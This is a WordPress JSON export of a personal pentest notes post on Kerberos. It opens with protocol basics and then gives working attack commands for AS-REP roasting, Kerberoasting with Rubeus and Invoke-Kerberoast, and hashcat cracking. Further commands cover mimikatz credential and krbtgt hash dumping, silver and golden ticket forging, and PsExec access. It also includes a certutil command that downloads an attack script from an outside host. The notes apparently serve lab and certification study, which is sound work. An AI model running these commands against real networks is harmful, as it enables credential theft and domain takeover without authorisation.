{"id":641,"date":"2020-02-10T18:01:41","date_gmt":"2020-02-10T17:01:41","guid":{"rendered":"https:\/\/privat.andreas-klingler.de\/itsec\/?p=641"},"modified":"2024-09-15T13:12:42","modified_gmt":"2024-09-15T11:12:42","slug":"kerberos","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=641","title":{"rendered":"Kerberos"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Basics<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><span class=\"caps\">TCP<\/span>\/88 <strong>and<\/strong> <span class=\"caps\">UDP<\/span>\/88<\/li>\n\n\n\n<li>Ker\u00adberos is an authen\u00adti\u00adca\u00adtion protocol.&nbsp;<ul class=\"wp-block-list\">\n<li>Not an autho\u00adriza\u00adtion protocol!<\/li>\n\n\n\n<li>It authen\u00adti\u00adcates a user, but each ser\u00advice who uses it has to autho\u00adrize the&nbsp;user!<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>The com\u00adpo\u00adnents of a Ker\u00adberos sys\u00adtem&nbsp;are&nbsp;<ul class=\"wp-block-list\">\n<li>a <strong>user<\/strong> or client,<\/li>\n\n\n\n<li>an <strong>Appli\u00adca\u00adtion Serv\u00ader <span class=\"caps\">AP<\/span><\/strong> who offers a ser\u00advice&nbsp;and<\/li>\n\n\n\n<li>the <strong>Key Dis\u00adtri\u00adb\u00adu\u00adtion Cen\u00adter <span class=\"caps\">KDC<\/span><\/strong>.\n<ul class=\"wp-block-list\">\n<li>Issues tick\u00adets<\/li>\n\n\n\n<li>Installed on the Domain Controller<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Tick\u00adet&nbsp;types:&nbsp;<ul class=\"wp-block-list\">\n<li><strong>Tick\u00adet Grant\u00adi\u00adng Ser\u00advice <span class=\"caps\">TGS<\/span><\/strong>: Tick\u00adet with which a user authen\u00adti\u00adcate against an appli\u00adca\u00adtion server.<\/li>\n\n\n\n<li><strong>Tick\u00adet Grant\u00adi\u00adng Tick\u00adet <span class=\"caps\">TGT<\/span><\/strong>: Tick\u00adet for the <span class=\"caps\">KDC<\/span> to request a&nbsp;<span class=\"caps\">TGS<\/span>.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Win\u00addows stores pass\u00adword hash\u00ades in the <em><span class=\"caps\">LSASS<\/span> Local Secu\u00adri\u00adty Author\u00adi\u00adty Sub\u00adsys\u00adtem Ser\u00advice<\/em>.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Authen\u00adti\u00adca\u00adtion sequence for an user to log in on a domain (con\u00adtroller):<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Client sends a <span class=\"caps\">AS-REQ<\/span> Authen\u00adti\u00adca\u00adtion Serv\u00ader Request to the <span class=\"caps\">DC<\/span>&nbsp;with&nbsp;<ul class=\"wp-block-list\">\n<li>the Time\u00adstamp, encrypt\u00aded with the user\u2019s pass\u00adword hash (which the <span class=\"caps\">DC<\/span> also&nbsp;has)<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><span class=\"caps\">DC<\/span> decrypts the mes\u00adsage with the user\u2019s hash. If the time\u00adstamp is valid and not already used, the <span class=\"caps\">DC<\/span> notes this user as logged in and returns it to the client.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Authen\u00adti\u00adca\u00adtion sequence for an authen\u00adti\u00adcat\u00aded user on a local system:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Client requests from <span class=\"caps\">KDC<\/span> a&nbsp;<span class=\"caps\">TGT<\/span>&nbsp;<ul class=\"wp-block-list\">\n<li>Request con\u00adtains\n<ul class=\"wp-block-list\">\n<li>time\u00adstamp,<\/li>\n\n\n\n<li><span class=\"caps\">SPN<\/span> (request\u00aded service),<\/li>\n\n\n\n<li>user name&nbsp;and<\/li>\n\n\n\n<li>user <span class=\"caps\">NONCE<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><span class=\"caps\">KDC<\/span> sends to the client a&nbsp;<span class=\"caps\">TGT<\/span>&nbsp;<ul class=\"wp-block-list\">\n<li><span class=\"caps\">KDC<\/span> checks timestamp<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Client requests from <span class=\"caps\">KDC<\/span> a&nbsp;<span class=\"caps\">TGS<\/span>&nbsp;<ul class=\"wp-block-list\">\n<li>Request con\u00adtains\n<ul class=\"wp-block-list\">\n<li><span class=\"caps\">TGT<\/span><\/li>\n\n\n\n<li>new time\u00adstamp<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><span class=\"caps\">KDC<\/span> sends to the client a&nbsp;<span class=\"caps\">TGS<\/span><\/li>\n\n\n\n<li>Client sends <span class=\"caps\">TGS<\/span> to Appli\u00adca\u00adtion Serv\u00ader&nbsp;<span class=\"caps\">AP<\/span><\/li>\n\n\n\n<li><em>Option\u00adal<\/em>: The <span class=\"caps\">AP<\/span> ver\u00adi\u00adfies the clien\u00adt\u2019s request agains the&nbsp;<span class=\"caps\">KDC<\/span>.<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Terminology<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Ker\u00adberoast\u00ading<\/strong> means an offline crack\u00ading of the pass\u00adword in the <span class=\"caps\">NTLM<\/span> hash. Use\u00adless if the ser\u00advice runs as ser\u00advice user. Then, the pass\u00adword will be replaced by a 128 char\u00adac\u00adter long pass\u00adword each 30 days auto\u00admat\u00adi\u00adcal\u00adly. Pos\u00adsi\u00adble if the ser\u00advice runs as nor\u00admal user who maybe chose a weak password.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Attacks<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">AS-REP-Roasting<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">A <strong>Ker\u00adberoast\u00ading<\/strong> attack which does\u00adn\u2019t need shell access. <span class=\"caps\">DO<\/span> <span class=\"caps\">THIS<\/span> <span class=\"caps\">ALSO<\/span> if you have already credentials!<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Tries to find out user\u00adnames for which no pre-authen\u00adti\u00adca\u00adtion is required. For these users, every\u00adbody can request a ini\u00adtial <span class=\"caps\">TGT<\/span>, which con\u00adtains the orig\u00adi\u00adnal user key, encrypt\u00aded by the user\u2019s pass\u00adword. This can be breaked.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Cre\u00adate list with&nbsp;users.<\/li>\n\n\n\n<li>Use <a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/GetNPUsers.py\">GetNPUsers.py<\/a> to har\u00advest non-preauth respons\u00ades from the <span class=\"caps\">DC<\/span>.<br><strong><span class=\"caps\">WARNING<\/span>: It can be that no suc\u00adcess is shown <span class=\"caps\">BUT<\/span> <span class=\"caps\">THE<\/span> <span class=\"caps\">FILE<\/span> <span class=\"caps\">EXISTS<\/span> with a&nbsp;hash!<\/strong><\/li>\n\n\n\n<li> <pre>GetNPUsers.py svcorp.com\/USERNAME -dc-ip 10.11.1.20 -usersfile kerberos-found-users.txt -format hashcat -outputfile \/tmp\/hashes.asreproast<\/pre> <\/li>\n\n\n\n<li>Crack it with hash\u00adcat. <pre>\/opt\/hashcat\/hashcat -m18200 -a0 -O --session name_der_sitzung --self-test-disable \/tmp\/test.hash \/opt\/rockyou.txt<\/pre><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Alter\u00adna\u00adtive: Request Tick\u00adet&nbsp;via:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">python3 \/usr\/share\/doc\/python3-impacket\/examples\/GetUserSPNs.py $domain\/$user:$password -dc-ip $target -request<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Alter\u00adna\u00adtive: Request tick\u00adet via <a href=\"https:\/\/github.com\/GhostPack\/Rubeus\">Rubeus<\/a> (com\u00adpiled exe is in the enum directory)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Rubeus.exe kerberoast \/creduser:active.htb\\SVC_TGS \/dc:$target \/credpassword:GPPstillStandingStrong2k18 \/outfile:h.txt<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Service Account Attack<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">A <strong>Ker\u00adberoast\u00ading<\/strong> attack which needs shell access.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Request ser\u00advice tick\u00adet from the <span class=\"caps\">DC<\/span>. In the first step, no authen\u00adti\u00adca\u00adtion is required, so every\u00adbody can do&nbsp;this.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">With Rubeus<\/h4>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Upload Rubeus (see <a href=\"https:\/\/github.com\/GhostPack\/Rubeus\/releases\/tag\/1.6.4\">Github<\/a> or the p61.general directory)<\/li>\n\n\n\n<li>Exe\u00adcute<br><code>Rubeus.exe kerberoast \/outfile:hashes.kerberoast<\/code><\/li>\n\n\n\n<li>Break found hash\u00ades with <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=391\" data-type=\"post\" data-id=\"391\">hash\u00adcat<\/a> and mode <em>13100<\/em>.<\/li>\n<\/ol>\n\n\n\n<h4 class=\"wp-block-heading\">Manually in Powershell<\/h4>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Open Pow\u00ader\u00adshell<\/li>\n\n\n\n<li>User Pow\u00aderView to obtain the <em>ser\u00advi\u00adceprin\u00adci\u00adpal\u00adname<\/em> from a ser\u00advice. (E.g. via the oscp-enum-script.ps1 script \/ see escalation_scripts direc\u00adto\u00adry.) <em>Make sure that you are logged in in a domain and not in a local account!<\/em> Lets say the fol\u00adlow\u00ading was found:<br><pre>serviceprincipalname {<em>HTTP\/CorpWebServer.corp.com<\/em>}<\/pre><\/li>\n\n\n\n<li>Then, cre\u00adate a ser\u00advice tick\u00adet from the <span class=\"caps\">DC<\/span> via Pow\u00ader\u00adShell:<br><pre>Add-Type -AssemblyName System.IdentityModel<br>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<em>HTTP\/CorpWebServer.corp.com<\/em>'<\/pre><\/li>\n\n\n\n<li>Direct after this exe\u00adcu\u00adtion, the mem\u00ado\u00adry holds the tick\u00adet. It can be shown with<br><pre>klist<\/pre><\/li>\n\n\n\n<li>Exe\u00adcute mimikatz.exe (as a user!) and export all cached tick\u00adets with<br><pre>kerberos::list \/export<\/pre><\/li>\n\n\n\n<li>Transer the export\u00aded files to the local system.<\/li>\n\n\n\n<li>Crack the hash\u00ades<br><pre>python \/usr\/share\/kerberoast\/tgsrepcrack.py wordlist.txt 1-40a50000-offsec@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi<\/pre><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Alter\u00adna\u00adtive:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Upload Invoke-Kerberoast.ps1<br><pre>certutil.exe -urlcache -split -f \"http:\/\/192.168.119.158:8000\/Invoke-Kerberoast.ps1\" Invoke-Kerberoast.ps1<\/pre><\/li>\n\n\n\n<li>Per\u00adform step three from before to make sure that tick\u00adets are in the&nbsp;cache.<\/li>\n\n\n\n<li>Grab hashs for Hash\u00adcat<br><pre>powershell -exec bypass<br>Import-Module .\\Invoke-Kerberoast.ps1<br>Invoke-Kerberoast -OutputFormat hashcat<\/pre><\/li>\n\n\n\n<li>Break them<br><pre>\/opt\/hashcat\/hashcat -m13100 -a0 -O --self-test-disable kerberos-raw.txt \/opt\/all_seclist_with_rockyou.txt<\/pre><\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">Silver Ticket attack (one service)<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Required:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Hash for a pass\u00adword of a ser\u00advice account<\/li>\n\n\n\n<li>Domain <span class=\"caps\">SID<\/span><\/li>\n\n\n\n<li>Tar\u00adget&nbsp;<span class=\"caps\">SPN<\/span><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Back\u00adground:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>A <span class=\"caps\">TGS<\/span> Tick\u00adet Grant\u00adi\u00adng Ser\u00advice is received and checked from a ser\u00advice to deter\u00admine if we can access it.<\/li>\n\n\n\n<li>The <span class=\"caps\">TGS<\/span> is encrypt\u00aded with the hash of the pass\u00adword of the ser\u00advice account.<\/li>\n\n\n\n<li>The <span class=\"caps\">TGS<\/span> con\u00adtains the per\u00admis\u00adsions for the server.<\/li>\n\n\n\n<li>There\u00adfore: If we have the hash of the pass\u00adword from a ser\u00advice account, we can cre\u00adate our own <span class=\"caps\">TGS<\/span> with the per\u00admis\u00adsions we&nbsp;want.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Get the requirements:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Get the Hash of the ser\u00advice account&nbsp;<ul class=\"wp-block-list\">\n<li>Use mimikatz and <code>privilege::debug, sekurlsa::logonpasswords<\/code> to get the <span class=\"caps\">NTLM<\/span> hash e.g. from the iis_service<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Get the Domain <span class=\"caps\">SID<\/span>&nbsp;<ul class=\"wp-block-list\">\n<li>The domain <span class=\"caps\">SID<\/span> is <span class=\"caps\">ABC<\/span> from <span class=\"caps\">ABCD<\/span> (see the <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=3383\">Win\u00addows secu\u00adri\u00adty fun\u00adda\u00admen\u00adtals<\/a>). Just get some user\u2019s id, like with <code>whoami \/user<\/code> and take the <span class=\"caps\">SID<\/span> with\u00adout the last&nbsp;part.<\/li>\n\n\n\n<li>Exam\u00adple: We got S\u20111\u20135\u201121\u20131987370270-658905905\u20131781884369-1105. Then, the Domain <span class=\"caps\">SID<\/span> = S\u20111\u20135\u201121\u20131987370270-658905905\u20131781884369.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Tar\u00adget&nbsp;<span class=\"caps\">SPN<\/span>&nbsp;<ul class=\"wp-block-list\">\n<li><\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Then, use mimikatz to cre\u00adate a sil\u00adver tick\u00adet on the sys\u00adtem for a giv\u00aden user. (Note: mimikatz <code>kerberos:golden<\/code> cre\u00adates sil\u00adver and gold\u00aden tick\u00adets\u2026) Here, for exam\u00adple for the <span class=\"caps\">IIS<\/span> ser\u00advice on the web1.dom.ain host.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">kerberos::golden<br>\/sid:S-1-5-21-1987370270-658905905-1781884369<br>\/domain:dom.ain<br>\/ptt<br>\/target:web1.dom.ain<br>\/service:http<br>\/rc4:$ntlmHash<br>\/user:$userToInject<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">To check if it worked: Exit mimikatz and exe\u00adcute the <code>klist<\/code> com\u00admand. The tick\u00adet should be vis\u00adi\u00adble&nbsp;there.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Golden Ticket attack (all services)<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Required:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Hash of the pass\u00adword of the krbt\u00adgt domain account <strong>or<\/strong> access to an admin\u00adis\u00adtra\u00adtive domain group&nbsp;user.<\/li>\n\n\n\n<li>Domain <span class=\"caps\">SID<\/span><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Back\u00adground:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The <span class=\"caps\">DC<\/span>\/<span class=\"caps\">KDC<\/span> encrypts the <span class=\"caps\">TGT<\/span> with the pass\u00adword hash of the domain user <em>krbt\u00adgt<\/em>.<\/li>\n\n\n\n<li>If we got this users <span class=\"caps\">NTLM<\/span> hash, then we can cre\u00adate TGTs for all ser\u00advices and users \u2014 a gold\u00aden ticket.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Get the requirements:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>To get the krbt\u00adgt\u2019s hash: As a user in the admin\u00adis\u00adtra\u00adtive domain group, exe\u00adcute mimikatz and note the <span class=\"caps\">NTLM<\/span> hash of the krbt\u00adgt account:<br><code>privilege::debug<br>lsadump::lsa \/patch<\/code><\/li>\n\n\n\n<li>To get the Domain <span class=\"caps\">SID<\/span>: See the first line after the pre\u00advi\u00adous lsad\u00adump command.<\/li>\n<\/ol>\n\n\n\n<ol class=\"wp-block-list\">\n<li><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Now, on some com\u00adpro\u00admised domain com\u00adput\u00ader with some account <code>$currentUser<\/code> in mimikatz:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">kerberos::purge \/\/ to remove other tickets which may be used before our golden ticket.<br>kerberos::golden \/user:$currentUser \/domain:dom.ain \/sid:$sid \/krbtgt:$krbtgthash \/ptt<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Cre\u00adate a new cmd ses\u00adsion out of mimikatz:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">misc::cmd<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Now you can authen\u00adti\u00adcate to any ser\u00advice in the domain.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Impor\u00adtant: Use the smb name and not the domain, because the tick\u00adet would not be used if it is for the smb name and not for the&nbsp;<span class=\"caps\">IP<\/span>!<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">PsExec64.exe \\\\dc01 cmd.exe \/\/ works<br>PsExec64.exe \\\\10.10.10.1 cmd.exe \/\/ works not<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Note: As soon as a Gold\u00aden Tick\u00adet was gen\u00ader\u00adat\u00aded, the domain own\u00ader has to change the krbt\u00adgt\u2019s pass\u00adword twice. Because the last two pass\u00adwords are&nbsp;valid\u2026<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Pass The Hash (<span class=\"caps\">PTH<\/span>)<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Required: User\u00adname and <span class=\"caps\">NTML<\/span>&nbsp;hash.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Get the users hash from <span class=\"caps\">SAM<\/span> files or the memory<\/li>\n\n\n\n<li>Use this hash to authen\u00adti\u00adcate against the <span class=\"caps\">KDC<\/span> to obtain tick\u00adets for var\u00adi\u00adous services<\/li>\n\n\n\n<li>Use <a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/getTGT.py\">getTGT.py<\/a> to obtain a hash for a giv\u00aden user account.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Pass the Ticket (<span class=\"caps\">PTT<\/span>)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Get a real tick\u00adet from the user by a Man-in-the-Mid\u00addle attack.<\/li>\n\n\n\n<li>Or direct\u00adly from a sys\u00adtem via Mimikatz. (<a href=\"https:\/\/www.tarlogic.com\/en\/blog\/how-to-attack-kerberos\/\">Source and demo for Lin\u00adux and Win\u00addows<\/a>.)<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">More information<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/book.hacktricks.xyz\/pentesting\/pentesting-kerberos-88\">https:\/\/book.hacktricks.xyz\/pentesting\/pentesting-kerberos-88<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.tarlogic.com\/en\/blog\/how-to-attack-kerberos\/\">https:\/\/www.tarlogic.com\/en\/blog\/how-to-attack-kerberos\/<\/a><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Basics Authen\u00adti\u00adca\u00adtion sequence for an user to log in on a domain (con\u00adtroller): Authen\u00adti\u00adca\u00adtion sequence for an authen\u00adti\u00adcat\u00aded user on a local sys\u00adtem: Ter\u00admi\u00adnol\u00ado\u00adgy Ker\u00adberoast\u00ading means an offline crack\u00ading of the pass\u00adword in the <span class=\"caps\">NTLM<\/span> hash. Use\u00adless if the ser\u00advice runs as ser\u00advice user. Then, the pass\u00adword will be replaced by a 128 char\u00adac\u00adter&nbsp;long&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[323],"tags":[181,54,24],"class_list":["post-641","post","type-post","status-publish","format-standard","hentry","category-protocol","tag-kerberos","tag-smb","tag-windows"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=641"}],"version-history":[{"count":49,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/641\/revisions"}],"predecessor-version":[{"id":4379,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/641\/revisions\/4379"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}